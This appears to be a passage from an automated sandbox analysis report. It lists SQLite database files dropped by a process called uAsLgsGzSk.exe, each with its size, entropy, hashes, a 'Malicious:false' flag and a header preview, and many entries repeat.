                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:41EA9A4112F057AE6BA17E2838AEAC26
SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):49152
Entropy (8bit):0.8180424350137764
Encrypted:false
SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:349E6EB110E34A08924D92F6B334801D
SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5712781801655107
Encrypted:false
SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:05A60B4620923FD5D53B9204391452AF
SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
